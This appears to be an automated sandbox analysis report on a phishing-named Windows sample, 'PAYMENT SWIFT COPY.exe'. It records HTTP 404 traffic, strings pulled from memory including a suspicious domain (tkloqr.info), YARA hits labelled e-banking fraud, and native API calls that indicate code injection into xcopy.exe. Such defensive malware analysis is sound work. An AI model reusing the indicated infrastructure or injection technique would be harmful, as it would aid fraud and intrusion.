                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 19 Feb 2025 04:52:54 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 19 Feb 2025 04:52:57 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 19 Feb 2025 04:52:59 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 19 Feb 2025 04:53:31 GMT | Server: Apache/2 | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 19 Feb 2025 04:53:34 GMT | Server: Apache/2 | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 19 Feb 2025 04:53:37 GMT | Server: Apache/2 | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 19 Feb 2025 04:53:39 GMT | Server: Apache/2 | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 19 Feb 2025 04:53:45 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Thu, 28 Nov 2024 18:47:30 GMT | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8nO9ZKzXdVwshhZogcdWQSdD%2FR5xtJQ2NWKD2ZQ67Xbz62GIbyNxa%2BFgObK4twpko6NtNE65wNUdptsqgKKQydb2fWMjk6jLxuf8KZl4G83BK9049auWmAEu4OfXmGBMQXsTSzJLmA%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 9143a7ada91442a6-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1584&rtt_var=792&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=803&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 19 Feb 2025 04:53:47 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Thu, 28 Nov 2024 18:47:30 GMT | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tlGaMXU1gm2Ud83wufsAGw2t61a9z%2Frn%2FZ9%2BX1yi8GIPwyFOxJTiAld5TgjoBd12PZzuA4cZUEpcIelhmaOYndfMPrIgsqiFn%2FcuEWYWx72eDHfDG3YZEmdwso0X%2FDHvYTK1QuYjXA%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 9143a7bdcb720f7c-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1677&rtt_var=838&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=823&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 19 Feb 2025 04:53:50 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Thu, 28 Nov 2024 18:47:30 GMT | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S9dXw2V6yH%2FLVoEPb3ozAQv4NZcOssixf4CuZR8EdonqZV7gvGIWUocj9HcZShYLfI9Nq6Vd7us36DS2WKd1pGLkYBFhHWxIKfOk%2BNEAy87qKosJ%2FcM%2Bwc%2Fv6GdgEWBo%2FbF7cPyllQ%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 9143a7ce98c17c9a-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=2145&min_rtt=2145&rtt_var=1072&sent=3&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10905&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 19 Feb 2025 04:53:53 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Thu, 28 Nov 2024 18:47:30 GMT | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=37fH0cxESyD%2BovF65dJ0ePNao0jklYpo4XWVM%2FoiB3Qe42TOxQg8TzUyRC40UPsq0A1PbamyKi4Bl3Z4axF1J5MzCCrTtKMadFYRnoPHXhgYvAidxrFRTMRw0IeX9Z8c7AwULpVl2w%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 9143a7decb6f43ad-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1536&min_rtt=1536&rtt_var=768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=535&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: 603<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Wed, 19 Feb 2025 04:55:16 GMT | Transfer-Encoding: chunked | Connection: close | Data Raw: 30 0d 0a 0d 0a | Data Ascii: 0
                Source: drfYhRLxnrcfFY.exe, 00000014.00000002.4141299471.00000000045A6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://ibm-p8-kvm-03-guest-02.virt.pnr.lab.eng.rdu2.redhat.com/
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1730225320.0000000002F4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: NCchtKNKiPqC.exe, 00000009.00000002.1808387351.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name(
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp, PAYMENT SWIFT COPY.exe, 00000000.00000002.1729719943.00000000013DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
                Source: drfYhRLxnrcfFY.exe, 00000014.00000002.4143260862.0000000005824000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.tkloqr.info
                Source: drfYhRLxnrcfFY.exe, 00000014.00000002.4143260862.0000000005824000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.tkloqr.info/t9cz/
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
                Source: NCchtKNKiPqC.exe, 00000009.00000002.1808387351.0000000002B29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.w3.
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1741334962.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
                Source: xcopy.exe, 0000000F.00000002.4144207972.0000000007888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: xcopy.exe, 0000000F.00000002.4144207972.0000000007888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: xcopy.exe, 0000000F.00000002.4142153353.000000000401C000.00000004.10000000.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 00000014.00000002.4141299471.0000000003DCC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: xcopy.exe, 0000000F.00000002.4144207972.0000000007888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: xcopy.exe, 0000000F.00000002.4144207972.0000000007888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: xcopy.exe, 0000000F.00000002.4144207972.0000000007888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: xcopy.exe, 0000000F.00000002.4144207972.0000000007888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: xcopy.exe, 0000000F.00000002.4144207972.0000000007888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: xcopy.exe, 0000000F.00000002.4139981371.000000000295D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oa0
                Source: xcopy.exe, 0000000F.00000002.4139981371.0000000002934000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: xcopy.exe, 0000000F.00000002.4139981371.000000000295D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: xcopy.exe, 0000000F.00000002.4139981371.0000000002934000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: xcopy.exe, 0000000F.00000002.4139981371.0000000002934000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: xcopy.exe, 0000000F.00000002.4139981371.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: xcopy.exe, 0000000F.00000003.2050309655.0000000007866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: xcopy.exe, 0000000F.00000002.4144207972.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: xcopy.exe, 0000000F.00000002.4142153353.00000000039D4000.00000004.10000000.00040000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4144056627.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, drfYhRLxnrcfFY.exe, 00000014.00000002.4141299471.0000000003784000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2164726278.000000001A3A4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

                E-Banking Fraud

Source: Yara match | File source: 8.2.PAYMENT SWIFT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.PAYMENT SWIFT COPY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000014.00000002.4143260862.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.1987208170.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4141273840.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1867935515.0000000001810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4145888813.00000000067A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1867200881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4141340650.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1984565405.0000000002C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4139835446.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4141036989.00000000038E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1869778786.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

Source: initial sample | Static PE information: Filename: PAYMENT SWIFT COPY.exe
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0042C953 NtClose
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912B60 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019135C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01914340 NtSetContextThread
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01914650 NtSuspendThread
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912B80 NtQueryInformationFile
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912BA0 NtEnumerateValueKey
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912BF0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912BE0 NtQueryValueKey
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912AB0 NtWaitForSingleObject
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912AD0 NtReadFile
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912AF0 NtWriteFile
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912DB0 NtEnumerateKey
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912DD0 NtDelayExecution
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912D10 NtMapViewOfSection
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912D00 NtSetInformationFile
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912D30 NtUnmapViewOfSection
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912CA0 NtQueryInformationToken
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912CC0 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912CF0 NtOpenProcess
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912C00 NtQueryInformationProcess
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912C60 NtCreateKey
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912F90 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912FB0 NtResumeThread
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912FA0 NtQuerySection
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912FE0 NtCreateFile
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912F30 NtCreateSection
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912F60 NtCreateProcessEx
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912E80 NtReadVirtualMemory
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912EA0 NtAdjustPrivilegesToken
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912EE0 NtQueueApcThread
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01912E30 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01913090 NtSetValueKey
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01913010 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019139B0 NtGetContextThread
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01913D10 NtOpenProcessToken
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01913D70 NtOpenThread
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F34340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F34650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F335C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F339B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32FA0 NtQuerySection
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F32D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F33090 NtSetValueKey
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F33010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F33D70 NtOpenThread
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_02F33D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_00549470 NtCreateFile
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_005495E0 NtReadFile
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_005496D0 NtDeleteFile
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_00549780 NtClose
Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 15_2_005498F0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 0_2_010CDA5C
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_004187C3
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0040E153
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_00410163
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_004169C3
